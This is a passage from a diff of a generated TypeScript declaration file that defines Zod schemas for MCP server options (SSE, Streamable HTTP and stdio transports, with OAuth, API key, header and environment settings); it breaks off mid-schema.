547
+ token_url?: string | undefined;
548
+ client_id?: string | undefined;
549
+ client_secret?: string | undefined;
550
+ scope?: string | undefined;
551
+ redirect_uri?: string | undefined;
552
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
553
+ grant_types_supported?: string[] | undefined;
554
+ token_endpoint_auth_methods_supported?: string[] | undefined;
555
+ response_types_supported?: string[] | undefined;
556
+ code_challenge_methods_supported?: string[] | undefined;
557
+ skip_code_challenge_check?: boolean | undefined;
558
+ revocation_endpoint?: string | undefined;
559
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
560
+ }>>;
561
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
562
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
563
+ /**
564
+ * API Key authentication configuration for SSE and Streamable HTTP transports
565
+ * - source: 'admin' means the key is provided by admin and shared by all users
566
+ * - source: 'user' means each user provides their own key via customUserVars
567
+ */
568
+ apiKey: z.ZodOptional<z.ZodObject<{
569
+ /** API key value (only for admin-provided mode, stored encrypted) */
570
+ key: z.ZodOptional<z.ZodString>;
571
+ /** Whether key is provided by admin or each user */
572
+ source: z.ZodEnum<["admin", "user"]>;
573
+ /** How to format the authorization header */
574
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
575
+ /** Custom header name when authorization_type is 'custom' */
576
+ custom_header: z.ZodOptional<z.ZodString>;
577
+ }, "strip", z.ZodTypeAny, {
578
+ source: "admin" | "user";
579
+ authorization_type: "custom" | "basic" | "bearer";
580
+ key?: string | undefined;
581
+ custom_header?: string | undefined;
582
+ }, {
583
+ source: "admin" | "user";
584
+ authorization_type: "custom" | "basic" | "bearer";
585
+ key?: string | undefined;
586
+ custom_header?: string | undefined;
587
+ }>>;
588
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
589
+ title: z.ZodString;
590
+ description: z.ZodString;
591
+ }, "strip", z.ZodTypeAny, {
592
+ title: string;
593
+ description: string;
594
+ }, {
595
+ title: string;
596
+ description: string;
597
+ }>>>;
598
+ } & {
599
+ type: z.ZodDefault<z.ZodLiteral<"sse">>;
600
+ headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
601
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
602
+ }, "strip", z.ZodTypeAny, {
603
+ type: "sse";
604
+ url: string;
605
+ title?: string | undefined;
606
+ description?: string | undefined;
607
+ startup?: boolean | undefined;
608
+ iconPath?: string | undefined;
609
+ timeout?: number | undefined;
610
+ sseReadTimeout?: number | undefined;
611
+ initTimeout?: number | undefined;
612
+ chatMenu?: boolean | undefined;
613
+ serverInstructions?: string | boolean | undefined;
614
+ requiresOAuth?: boolean | undefined;
615
+ oauth?: {
616
+ authorization_url?: string | undefined;
617
+ token_url?: string | undefined;
618
+ client_id?: string | undefined;
619
+ client_secret?: string | undefined;
620
+ scope?: string | undefined;
621
+ redirect_uri?: string | undefined;
622
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
623
+ grant_types_supported?: string[] | undefined;
624
+ token_endpoint_auth_methods_supported?: string[] | undefined;
625
+ response_types_supported?: string[] | undefined;
626
+ code_challenge_methods_supported?: string[] | undefined;
627
+ skip_code_challenge_check?: boolean | undefined;
628
+ revocation_endpoint?: string | undefined;
629
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
630
+ } | undefined;
631
+ oauth_headers?: Record<string, string> | undefined;
632
+ apiKey?: {
633
+ source: "admin" | "user";
634
+ authorization_type: "custom" | "basic" | "bearer";
635
+ key?: string | undefined;
636
+ custom_header?: string | undefined;
637
+ } | undefined;
638
+ customUserVars?: Record<string, {
639
+ title: string;
640
+ description: string;
641
+ }> | undefined;
642
+ headers?: Record<string, string> | undefined;
643
+ }, {
644
+ url: string;
645
+ title?: string | undefined;
646
+ description?: string | undefined;
647
+ startup?: boolean | undefined;
648
+ iconPath?: string | undefined;
649
+ timeout?: number | undefined;
650
+ sseReadTimeout?: number | undefined;
651
+ initTimeout?: number | undefined;
652
+ chatMenu?: boolean | undefined;
653
+ type?: "sse" | undefined;
654
+ serverInstructions?: string | boolean | undefined;
655
+ requiresOAuth?: boolean | undefined;
656
+ oauth?: {
657
+ authorization_url?: string | undefined;
658
+ token_url?: string | undefined;
659
+ client_id?: string | undefined;
660
+ client_secret?: string | undefined;
661
+ scope?: string | undefined;
662
+ redirect_uri?: string | undefined;
663
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
664
+ grant_types_supported?: string[] | undefined;
665
+ token_endpoint_auth_methods_supported?: string[] | undefined;
666
+ response_types_supported?: string[] | undefined;
667
+ code_challenge_methods_supported?: string[] | undefined;
668
+ skip_code_challenge_check?: boolean | undefined;
669
+ revocation_endpoint?: string | undefined;
670
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
671
+ } | undefined;
672
+ oauth_headers?: Record<string, string> | undefined;
673
+ apiKey?: {
674
+ source: "admin" | "user";
675
+ authorization_type: "custom" | "basic" | "bearer";
676
+ key?: string | undefined;
677
+ custom_header?: string | undefined;
678
+ } | undefined;
679
+ customUserVars?: Record<string, {
680
+ title: string;
681
+ description: string;
682
+ }> | undefined;
683
+ headers?: Record<string, string> | undefined;
684
+ }>;
685
+ export declare const StreamableHTTPOptionsSchema: z.ZodObject<{
686
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
687
+ title: z.ZodOptional<z.ZodString>;
688
+ /** Description of the MCP server */
689
+ description: z.ZodOptional<z.ZodString>;
690
+ /**
691
+ * Controls whether the MCP server is initialized during application startup.
692
+ * - true (default): Server is initialized during app startup and included in app-level connections
693
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
694
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
695
+ */
696
+ startup: z.ZodOptional<z.ZodBoolean>;
697
+ iconPath: z.ZodOptional<z.ZodString>;
698
+ timeout: z.ZodOptional<z.ZodNumber>;
699
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
700
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
701
+ initTimeout: z.ZodOptional<z.ZodNumber>;
702
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
703
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
704
+ /**
705
+ * Controls server instruction behavior:
706
+ * - undefined/not set: No instructions included (default)
707
+ * - true: Use server-provided instructions
708
+ * - string: Use custom instructions (overrides server-provided)
709
+ */
710
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
711
+ /**
712
+ * Whether this server requires OAuth authentication
713
+ * If not specified, will be auto-detected during construction
714
+ */
715
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
716
+ /**
717
+ * OAuth configuration for SSE and Streamable HTTP transports
718
+ * - Optional: OAuth can be auto-discovered on 401 responses
719
+ * - Pre-configured values will skip discovery steps
720
+ */
721
+ oauth: z.ZodOptional<z.ZodObject<{
722
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
723
+ authorization_url: z.ZodOptional<z.ZodString>;
724
+ /** OAuth token endpoint (optional - can be auto-discovered) */
725
+ token_url: z.ZodOptional<z.ZodString>;
726
+ /** OAuth client ID (optional - can use dynamic registration) */
727
+ client_id: z.ZodOptional<z.ZodString>;
728
+ /** OAuth client secret (optional - can use dynamic registration) */
729
+ client_secret: z.ZodOptional<z.ZodString>;
730
+ /** OAuth scopes to request */
731
+ scope: z.ZodOptional<z.ZodString>;
732
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
733
+ redirect_uri: z.ZodOptional<z.ZodString>;
734
+ /** Token exchange method */
735
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
736
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
737
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
738
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
739
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
740
+ /** Supported response types (defaults to ['code']) */
741
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
742
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
743
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
744
+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
745
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
746
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
747
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
748
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
749
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
750
+ }, "strip", z.ZodTypeAny, {
751
+ authorization_url?: string | undefined;
752
+ token_url?: string | undefined;
753
+ client_id?: string | undefined;
754
+ client_secret?: string | undefined;
755
+ scope?: string | undefined;
756
+ redirect_uri?: string | undefined;
757
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
758
+ grant_types_supported?: string[] | undefined;
759
+ token_endpoint_auth_methods_supported?: string[] | undefined;
760
+ response_types_supported?: string[] | undefined;
761
+ code_challenge_methods_supported?: string[] | undefined;
762
+ skip_code_challenge_check?: boolean | undefined;
763
+ revocation_endpoint?: string | undefined;
764
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
765
+ }, {
766
+ authorization_url?: string | undefined;
767
+ token_url?: string | undefined;
768
+ client_id?: string | undefined;
769
+ client_secret?: string | undefined;
770
+ scope?: string | undefined;
771
+ redirect_uri?: string | undefined;
772
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
773
+ grant_types_supported?: string[] | undefined;
774
+ token_endpoint_auth_methods_supported?: string[] | undefined;
775
+ response_types_supported?: string[] | undefined;
776
+ code_challenge_methods_supported?: string[] | undefined;
777
+ skip_code_challenge_check?: boolean | undefined;
778
+ revocation_endpoint?: string | undefined;
779
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
780
+ }>>;
781
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
782
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
783
+ /**
784
+ * API Key authentication configuration for SSE and Streamable HTTP transports
785
+ * - source: 'admin' means the key is provided by admin and shared by all users
786
+ * - source: 'user' means each user provides their own key via customUserVars
787
+ */
788
+ apiKey: z.ZodOptional<z.ZodObject<{
789
+ /** API key value (only for admin-provided mode, stored encrypted) */
790
+ key: z.ZodOptional<z.ZodString>;
791
+ /** Whether key is provided by admin or each user */
792
+ source: z.ZodEnum<["admin", "user"]>;
793
+ /** How to format the authorization header */
794
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
795
+ /** Custom header name when authorization_type is 'custom' */
796
+ custom_header: z.ZodOptional<z.ZodString>;
797
+ }, "strip", z.ZodTypeAny, {
798
+ source: "admin" | "user";
799
+ authorization_type: "custom" | "basic" | "bearer";
800
+ key?: string | undefined;
801
+ custom_header?: string | undefined;
802
+ }, {
803
+ source: "admin" | "user";
804
+ authorization_type: "custom" | "basic" | "bearer";
805
+ key?: string | undefined;
806
+ custom_header?: string | undefined;
807
+ }>>;
808
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
809
+ title: z.ZodString;
810
+ description: z.ZodString;
811
+ }, "strip", z.ZodTypeAny, {
812
+ title: string;
813
+ description: string;
814
+ }, {
815
+ title: string;
816
+ description: string;
817
+ }>>>;
818
+ } & {
819
+ type: z.ZodUnion<[z.ZodLiteral<"streamable-http">, z.ZodLiteral<"http">]>;
820
+ headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
821
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
822
+ }, "strip", z.ZodTypeAny, {
823
+ type: "streamable-http" | "http";
824
+ url: string;
825
+ title?: string | undefined;
826
+ description?: string | undefined;
827
+ startup?: boolean | undefined;
828
+ iconPath?: string | undefined;
829
+ timeout?: number | undefined;
830
+ sseReadTimeout?: number | undefined;
831
+ initTimeout?: number | undefined;
832
+ chatMenu?: boolean | undefined;
833
+ serverInstructions?: string | boolean | undefined;
834
+ requiresOAuth?: boolean | undefined;
835
+ oauth?: {
836
+ authorization_url?: string | undefined;
837
+ token_url?: string | undefined;
838
+ client_id?: string | undefined;
839
+ client_secret?: string | undefined;
840
+ scope?: string | undefined;
841
+ redirect_uri?: string | undefined;
842
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
843
+ grant_types_supported?: string[] | undefined;
844
+ token_endpoint_auth_methods_supported?: string[] | undefined;
845
+ response_types_supported?: string[] | undefined;
846
+ code_challenge_methods_supported?: string[] | undefined;
847
+ skip_code_challenge_check?: boolean | undefined;
848
+ revocation_endpoint?: string | undefined;
849
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
850
+ } | undefined;
851
+ oauth_headers?: Record<string, string> | undefined;
852
+ apiKey?: {
853
+ source: "admin" | "user";
854
+ authorization_type: "custom" | "basic" | "bearer";
855
+ key?: string | undefined;
856
+ custom_header?: string | undefined;
857
+ } | undefined;
858
+ customUserVars?: Record<string, {
859
+ title: string;
860
+ description: string;
861
+ }> | undefined;
862
+ headers?: Record<string, string> | undefined;
863
+ }, {
864
+ type: "streamable-http" | "http";
865
+ url: string;
866
+ title?: string | undefined;
867
+ description?: string | undefined;
868
+ startup?: boolean | undefined;
869
+ iconPath?: string | undefined;
870
+ timeout?: number | undefined;
871
+ sseReadTimeout?: number | undefined;
872
+ initTimeout?: number | undefined;
873
+ chatMenu?: boolean | undefined;
874
+ serverInstructions?: string | boolean | undefined;
875
+ requiresOAuth?: boolean | undefined;
876
+ oauth?: {
877
+ authorization_url?: string | undefined;
878
+ token_url?: string | undefined;
879
+ client_id?: string | undefined;
880
+ client_secret?: string | undefined;
881
+ scope?: string | undefined;
882
+ redirect_uri?: string | undefined;
883
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
884
+ grant_types_supported?: string[] | undefined;
885
+ token_endpoint_auth_methods_supported?: string[] | undefined;
886
+ response_types_supported?: string[] | undefined;
887
+ code_challenge_methods_supported?: string[] | undefined;
888
+ skip_code_challenge_check?: boolean | undefined;
889
+ revocation_endpoint?: string | undefined;
890
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
891
+ } | undefined;
892
+ oauth_headers?: Record<string, string> | undefined;
893
+ apiKey?: {
894
+ source: "admin" | "user";
895
+ authorization_type: "custom" | "basic" | "bearer";
896
+ key?: string | undefined;
897
+ custom_header?: string | undefined;
898
+ } | undefined;
899
+ customUserVars?: Record<string, {
900
+ title: string;
901
+ description: string;
902
+ }> | undefined;
903
+ headers?: Record<string, string> | undefined;
904
+ }>;
905
+ export declare const MCPOptionsSchema: z.ZodUnion<[z.ZodObject<{
906
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
907
+ title: z.ZodOptional<z.ZodString>;
908
+ /** Description of the MCP server */
909
+ description: z.ZodOptional<z.ZodString>;
910
+ /**
911
+ * Controls whether the MCP server is initialized during application startup.
912
+ * - true (default): Server is initialized during app startup and included in app-level connections
913
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
914
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
915
+ */
916
+ startup: z.ZodOptional<z.ZodBoolean>;
917
+ iconPath: z.ZodOptional<z.ZodString>;
918
+ timeout: z.ZodOptional<z.ZodNumber>;
919
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
920
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
921
+ initTimeout: z.ZodOptional<z.ZodNumber>;
922
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
923
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
924
+ /**
925
+ * Controls server instruction behavior:
926
+ * - undefined/not set: No instructions included (default)
927
+ * - true: Use server-provided instructions
928
+ * - string: Use custom instructions (overrides server-provided)
929
+ */
930
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
931
+ /**
932
+ * Whether this server requires OAuth authentication
933
+ * If not specified, will be auto-detected during construction
934
+ */
935
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
936
+ /**
937
+ * OAuth configuration for SSE and Streamable HTTP transports
938
+ * - Optional: OAuth can be auto-discovered on 401 responses
939
+ * - Pre-configured values will skip discovery steps
940
+ */
941
+ oauth: z.ZodOptional<z.ZodObject<{
942
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
943
+ authorization_url: z.ZodOptional<z.ZodString>;
944
+ /** OAuth token endpoint (optional - can be auto-discovered) */
945
+ token_url: z.ZodOptional<z.ZodString>;
946
+ /** OAuth client ID (optional - can use dynamic registration) */
947
+ client_id: z.ZodOptional<z.ZodString>;
948
+ /** OAuth client secret (optional - can use dynamic registration) */
949
+ client_secret: z.ZodOptional<z.ZodString>;
950
+ /** OAuth scopes to request */
951
+ scope: z.ZodOptional<z.ZodString>;
952
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
953
+ redirect_uri: z.ZodOptional<z.ZodString>;
954
+ /** Token exchange method */
955
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
956
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
957
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
958
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
959
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
960
+ /** Supported response types (defaults to ['code']) */
961
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
962
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
963
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
964
+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
965
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
966
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
967
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
968
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
969
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
970
+ }, "strip", z.ZodTypeAny, {
971
+ authorization_url?: string | undefined;
972
+ token_url?: string | undefined;
973
+ client_id?: string | undefined;
974
+ client_secret?: string | undefined;
975
+ scope?: string | undefined;
976
+ redirect_uri?: string | undefined;
977
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
978
+ grant_types_supported?: string[] | undefined;
979
+ token_endpoint_auth_methods_supported?: string[] | undefined;
980
+ response_types_supported?: string[] | undefined;
981
+ code_challenge_methods_supported?: string[] | undefined;
982
+ skip_code_challenge_check?: boolean | undefined;
983
+ revocation_endpoint?: string | undefined;
984
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
985
+ }, {
986
+ authorization_url?: string | undefined;
987
+ token_url?: string | undefined;
988
+ client_id?: string | undefined;
989
+ client_secret?: string | undefined;
990
+ scope?: string | undefined;
991
+ redirect_uri?: string | undefined;
992
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
993
+ grant_types_supported?: string[] | undefined;
994
+ token_endpoint_auth_methods_supported?: string[] | undefined;
995
+ response_types_supported?: string[] | undefined;
996
+ code_challenge_methods_supported?: string[] | undefined;
997
+ skip_code_challenge_check?: boolean | undefined;
998
+ revocation_endpoint?: string | undefined;
999
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1000
+ }>>;
1001
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
1002
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
1003
+ /**
1004
+ * API Key authentication configuration for SSE and Streamable HTTP transports
1005
+ * - source: 'admin' means the key is provided by admin and shared by all users
1006
+ * - source: 'user' means each user provides their own key via customUserVars
1007
+ */
1008
+ apiKey: z.ZodOptional<z.ZodObject<{
1009
+ /** API key value (only for admin-provided mode, stored encrypted) */
1010
+ key: z.ZodOptional<z.ZodString>;
1011
+ /** Whether key is provided by admin or each user */
1012
+ source: z.ZodEnum<["admin", "user"]>;
1013
+ /** How to format the authorization header */
1014
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
1015
+ /** Custom header name when authorization_type is 'custom' */
1016
+ custom_header: z.ZodOptional<z.ZodString>;
1017
+ }, "strip", z.ZodTypeAny, {
1018
+ source: "admin" | "user";
1019
+ authorization_type: "custom" | "basic" | "bearer";
1020
+ key?: string | undefined;
1021
+ custom_header?: string | undefined;
1022
+ }, {
1023
+ source: "admin" | "user";
1024
+ authorization_type: "custom" | "basic" | "bearer";
1025
+ key?: string | undefined;
1026
+ custom_header?: string | undefined;
1027
+ }>>;
1028
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
1029
+ title: z.ZodString;
1030
+ description: z.ZodString;
1031
+ }, "strip", z.ZodTypeAny, {
1032
+ title: string;
1033
+ description: string;
1034
+ }, {
1035
+ title: string;
1036
+ description: string;
1037
+ }>>>;
1038
+ } & {
1039
+ type: z.ZodDefault<z.ZodLiteral<"stdio">>;
1040
+ /**
1041
+ * The executable to run to start the server.
1042
+ */
1043
+ command: z.ZodString;
1044
+ /**
1045
+ * Command line arguments to pass to the executable.
1046
+ */
1047
+ args: z.ZodArray<z.ZodString, "many">;
1048
+ /**
1049
+ * The environment to use when spawning the process.
1050
+ *
1051
+ * If not specified, the result of getDefaultEnvironment() will be used.
1052
+ * Environment variables can be referenced using ${VAR_NAME} syntax.
1053
+ */
1054
+ env: z.ZodEffects<z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>, Record<string, string> | undefined, Record<string, string> | undefined>;
1055
+ /**
1056
+ * How to handle stderr of the child process. This matches the semantics of Node's `child_process.spawn`.
1057
+ *
1058
+ * @type {import('node:child_process').IOType | import('node:stream').Stream | number}
1059
+ *
1060
+ * The default is "inherit", meaning messages to stderr will be printed to the parent process's stderr.
1061
+ */
1062
+ stderr: z.ZodOptional<z.ZodUnion<[z.ZodEnum<["pipe", "ignore", "inherit"]>, z.ZodNumber]>>;
1063
+ }, "strip", z.ZodTypeAny, {
1064
+ type: "stdio";
1065
+ command: string;
1066
+ args: string[];
1067
+ title?: string | undefined;
1068
+ description?: string | undefined;
1069
+ startup?: boolean | undefined;
1070
+ iconPath?: string | undefined;
1071
+ timeout?: number | undefined;
1072
+ sseReadTimeout?: number | undefined;
1073
+ initTimeout?: number | undefined;
1074
+ chatMenu?: boolean | undefined;
1075
+ serverInstructions?: string | boolean | undefined;
1076
+ requiresOAuth?: boolean | undefined;
1077
+ oauth?: {
1078
+ authorization_url?: string | undefined;
1079
+ token_url?: string | undefined;
1080
+ client_id?: string | undefined;
1081
+ client_secret?: string | undefined;
1082
+ scope?: string | undefined;
1083
+ redirect_uri?: string | undefined;
1084
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1085
+ grant_types_supported?: string[] | undefined;
1086
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1087
+ response_types_supported?: string[] | undefined;
1088
+ code_challenge_methods_supported?: string[] | undefined;
1089
+ skip_code_challenge_check?: boolean | undefined;
1090
+ revocation_endpoint?: string | undefined;
1091
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1092
+ } | undefined;
1093
+ oauth_headers?: Record<string, string> | undefined;
1094
+ apiKey?: {
1095
+ source: "admin" | "user";
1096
+ authorization_type: "custom" | "basic" | "bearer";
1097
+ key?: string | undefined;
1098
+ custom_header?: string | undefined;
1099
+ } | undefined;
1100
+ customUserVars?: Record<string, {
1101
+ title: string;
1102
+ description: string;
1103
+ }> | undefined;
1104
+ env?: Record<string, string> | undefined;
1105
+ stderr?: number | "pipe" | "ignore" | "inherit" | undefined;
1106
+ }, {
1107
+ command: string;
1108
+ args: string[];
1109
+ title?: string | undefined;
1110
+ description?: string | undefined;
1111
+ startup?: boolean | undefined;
1112
+ iconPath?: string | undefined;
1113
+ timeout?: number | undefined;
1114
+ sseReadTimeout?: number | undefined;
1115
+ initTimeout?: number | undefined;
1116
+ chatMenu?: boolean | undefined;
1117
+ type?: "stdio" | undefined;
1118
+ serverInstructions?: string | boolean | undefined;
1119
+ requiresOAuth?: boolean | undefined;
1120
+ oauth?: {
1121
+ authorization_url?: string | undefined;
1122
+ token_url?: string | undefined;
1123
+ client_id?: string | undefined;
1124
+ client_secret?: string | undefined;
1125
+ scope?: string | undefined;
1126
+ redirect_uri?: string | undefined;
1127
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1128
+ grant_types_supported?: string[] | undefined;
1129
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1130
+ response_types_supported?: string[] | undefined;
1131
+ code_challenge_methods_supported?: string[] | undefined;
1132
+ skip_code_challenge_check?: boolean | undefined;
1133
+ revocation_endpoint?: string | undefined;
1134
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1135
+ } | undefined;
1136
+ oauth_headers?: Record<string, string> | undefined;
1137
+ apiKey?: {
1138
+ source: "admin" | "user";
1139
+ authorization_type: "custom" | "basic" | "bearer";
1140
+ key?: string | undefined;
1141
+ custom_header?: string | undefined;
1142
+ } | undefined;
1143
+ customUserVars?: Record<string, {
1144
+ title: string;
1145
+ description: string;
1146
+ }> | undefined;
1147
+ env?: Record<string, string> | undefined;
1148
+ stderr?: number | "pipe" | "ignore" | "inherit" | undefined;
1149
+ }>, z.ZodObject<{
1150
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
1151
+ title: z.ZodOptional<z.ZodString>;
1152
+ /** Description of the MCP server */
1153
+ description: z.ZodOptional<z.ZodString>;
1154
+ /**
1155
+ * Controls whether the MCP server is initialized during application startup.
1156
+ * - true (default): Server is initialized during app startup and included in app-level connections
1157
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
1158
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
1159
+ */
1160
+ startup: z.ZodOptional<z.ZodBoolean>;
1161
+ iconPath: z.ZodOptional<z.ZodString>;
1162
+ timeout: z.ZodOptional<z.ZodNumber>;
1163
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
1164
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
1165
+ initTimeout: z.ZodOptional<z.ZodNumber>;
1166
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
1167
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
1168
+ /**
1169
+ * Controls server instruction behavior:
1170
+ * - undefined/not set: No instructions included (default)
1171
+ * - true: Use server-provided instructions
1172
+ * - string: Use custom instructions (overrides server-provided)
1173
+ */
1174
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
1175
+ /**
1176
+ * Whether this server requires OAuth authentication
1177
+ * If not specified, will be auto-detected during construction
1178
+ */
1179
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
1180
+ /**
1181
+ * OAuth configuration for SSE and Streamable HTTP transports
1182
+ * - Optional: OAuth can be auto-discovered on 401 responses
1183
+ * - Pre-configured values will skip discovery steps
1184
+ */
1185
+ oauth: z.ZodOptional<z.ZodObject<{
1186
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
1187
+ authorization_url: z.ZodOptional<z.ZodString>;
1188
+ /** OAuth token endpoint (optional - can be auto-discovered) */
1189
+ token_url: z.ZodOptional<z.ZodString>;
1190
+ /** OAuth client ID (optional - can use dynamic registration) */
1191
+ client_id: z.ZodOptional<z.ZodString>;
1192
+ /** OAuth client secret (optional - can use dynamic registration) */
1193
+ client_secret: z.ZodOptional<z.ZodString>;
1194
+ /** OAuth scopes to request */
1195
+ scope: z.ZodOptional<z.ZodString>;
1196
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
1197
+ redirect_uri: z.ZodOptional<z.ZodString>;
1198
+ /** Token exchange method */
1199
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
1200
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
1201
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1202
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
1203
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1204
+ /** Supported response types (defaults to ['code']) */
1205
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1206
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
1207
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1208
+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
1209
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
1210
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
1211
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
1212
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
1213
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1214
